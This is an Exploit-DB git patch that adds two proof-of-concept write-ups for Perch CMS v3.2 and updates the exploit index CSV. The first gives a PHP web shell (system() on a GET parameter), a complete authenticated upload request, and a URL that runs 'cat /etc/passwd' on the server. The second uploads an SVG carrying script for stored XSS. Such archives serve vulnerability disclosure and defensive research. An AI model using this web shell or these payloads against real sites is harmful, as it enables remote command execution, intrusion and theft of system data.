From 033e7ba3e02a24af757ddf03242876bf270fb293 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Sat, 22 Jul 2023 00:16:25 +0000
Subject: [PATCH] DB: 2023-07-22

3 changes to exploits/shellcodes/ghdb

Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
Perch v3.2 - Remote Code Execution (RCE)
Perch v3.2 - Stored XSS

Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi
---
 exploits/php/webapps/51620.txt | 89 ++++++++++++++++++++++++++++++++++
 exploits/php/webapps/51621.txt | 31 ++++++++++++
 files_exploits.csv             |  6 ++-
 3 files changed, 124 insertions(+), 2 deletions(-)
 create mode 100644 exploits/php/webapps/51620.txt
 create mode 100644 exploits/php/webapps/51621.txt

diff --git a/exploits/php/webapps/51620.txt b/exploits/php/webapps/51620.txt
new file mode 100644
index 000000000..0828e87fd
--- /dev/null
+++ b/exploits/php/webapps/51620.txt
@@ -0,0 +1,89 @@
+Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
+Application: Perch Cms
+Version: v3.2
+Bugs:  RCE
+Technology: PHP
+Vendor URL: https://grabaperch.com/
+Software Link: https://grabaperch.com/download
+Date of found: 21.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+1. login to account as admin
+2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
+3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
+4. upload poc.phar file
+
+poc.phar file contents :
+<?php $a=$_GET['code']; echo system($a);?>
+
+5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd
+
+
+poc request:
+
+POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
+Host: localhost
+Content-Length: 1071
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
+Connection: close
+
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="resourceTitle"
+
+test
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="image"; filename="poc.phar"
+Content-Type: application/octet-stream
+
+<?php $a=$_GET['code']; echo system($a);?>
+
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="image_field"
+
+1
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="image_assetID"
+
+
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="resourceBucket"
+
+admin
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="tags"
+
+test
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="btnsubmit"
+
+Submit
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="formaction"
+
+edit
+------WebKitFormBoundaryYGoerZn09hHSjd4Z
+Content-Disposition: form-data; name="token"
+
+5494af3e8dbe5ac399ca7f12219cfe82
+------WebKitFormBoundaryYGoerZn09hHSjd4Z--
\ No newline at end of file
diff --git a/exploits/php/webapps/51621.txt b/exploits/php/webapps/51621.txt
new file mode 100644
index 000000000..0f82799a0
--- /dev/null
+++ b/exploits/php/webapps/51621.txt
@@ -0,0 +1,31 @@
+Exploit Title: Perch v3.2 - Stored XSS
+Application: Perch Cms
+Version: v3.2
+Bugs:  XSS
+Technology: PHP
+Vendor URL: https://grabaperch.com/
+Software Link: https://grabaperch.com/download
+Date of found: 21.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+1. login to account
+2. go to http://localhost/perch_v3.2/perch/core/settings/
+3. upload svg file
+
+"""
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+"""
+4. go to svg file (http://localhost/perch_v3.2/perch/resources/malas.svg)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4cd67671f..55292c0a6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -24773,7 +24773,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
 8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,,
 32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4934;OSVDB-53807,,,,,https://www.securityfocus.com/bid/34625/info
-51598,exploits/php/webapps/51598.sh,"Online Piggery Management System v1.0 - unauthenticated file upload vulnerability",2023-07-19,1337kid,webapps,php,,2023-07-19,2023-07-19,0,CVE-2023-37629,,,,,
+51598,exploits/php/webapps/51598.sh,"Online Piggery Management System v1.0 - unauthenticated file upload vulnerability",2023-07-19,1337kid,webapps,php,,2023-07-19,2023-07-21,1,CVE-2023-37629,,,,,
 51431,exploits/php/webapps/51431.py,"Online Pizza Ordering System v1.0 - Unauthenticated File Upload",2023-05-05,URGAN,webapps,php,,2023-05-05,2023-05-09,1,CVE-2023-2246,,,,,
 48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
 50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 -  SQLi Authentication Bypass",2021-12-03,"Mohamed habib Smidi",webapps,php,,2021-12-03,2021-12-16,0,CVE-2021-44655,,,,,
@@ -25615,6 +25615,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 13901,exploits/php/webapps/13901.txt,"PenPals - Authentication Bypass",2010-06-17,"L0rd CrusAd3r",webapps,php,,2010-06-16,,0,OSVDB-52214,,,,,
 4551,exploits/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusions",2007-10-21,GoLd_M,webapps,php,,2007-10-20,,1,OSVDB-45501;CVE-2007-5631;OSVDB-45500;OSVDB-45499;OSVDB-45498;OSVDB-45497;OSVDB-45496;OSVDB-45495,,,,,
 11938,exploits/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File",2010-03-30,eidelweiss,webapps,php,,2010-03-29,,1,OSVDB-63348;CVE-2010-1309;CVE-2008-7254,,,,http://www.exploit-db.compepsi-0.6-BETA2.tar.bz2,
+51620,exploits/php/webapps/51620.txt,"Perch v3.2 - Remote Code Execution (RCE)",2023-07-21,"Mirabbas Ağalarov",webapps,php,,2023-07-21,2023-07-21,0,,,,,,
+51621,exploits/php/webapps/51621.txt,"Perch v3.2 - Stored XSS",2023-07-21,"Mirabbas Ağalarov",webapps,php,,2023-07-21,2023-07-21,0,,,,,,
 43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,,2018-01-15,2018-01-15,0,CVE-2017-17976,,,,,
 6847,exploits/php/webapps/6847.txt,"Persia BME E-Catalogue - SQL Injection",2008-10-27,BugReport.IR,webapps,php,,2008-10-26,,1,OSVDB-49440,,,,,http://www.bugreport.ir/index_55.htm
 12819,exploits/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,webapps,php,,2010-05-30,,1,,,,,,
@@ -33720,7 +33722,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35394,exploits/php/webapps/35394.txt,"WordPress Plugin YT-Audio 1.7 - 'v' Cross-Site Scripting",2011-02-23,"AutoSec Tools",webapps,php,,2011-02-23,2014-11-28,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/46591/info
 16218,exploits/php/webapps/16218.txt,"WordPress Plugin Z-Vote 1.1 - SQL Injection",2011-02-23,"High-Tech Bridge SA",webapps,php,,2011-02-23,2011-02-23,0,OSVDB-71006,"WordPress Plugin",,,http://www.exploit-db.comz-vote.zip,http://www.htbridge.ch/advisory/sql_injection_in_z_vote_wordpress_plugin.html
 38050,exploits/php/webapps/38050.txt,"WordPress Plugin Zarzadzonie Kontem - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",webapps,php,,2012-11-22,2015-09-01,1,OSVDB-87834,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56663/info
-51024,exploits/php/webapps/51024.txt,"Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi",2022-10-06,"Rizacan Tufan",webapps,php,,2022-10-06,2022-10-06,0,CVE-2022-2840,,,,,
+51024,exploits/php/webapps/51024.txt,"Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi",2022-10-06,"Rizacan Tufan",webapps,php,,2022-10-06,2023-07-21,1,CVE-2022-2840,,,,,
 18111,exploits/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - 'ajax_save_name.php' Remote Code Execution",2011-11-13,EgiX,webapps,php,,2011-11-13,2011-11-13,1,OSVDB-77091,"WordPress Plugin",,,http://www.exploit-db.comzingiri-web-shop.2.2.3.zip,
 38101,exploits/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Local File Inclusion",2012-12-30,Amirh03in,webapps,php,,2012-12-30,2015-09-08,1,OSVDB-88295,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56777/info
 38046,exploits/php/webapps/38046.txt,"WordPress Plugin Zingiri Web Shop - 'path' Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",webapps,php,,2012-11-22,2015-09-01,1,OSVDB-87833,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56659/info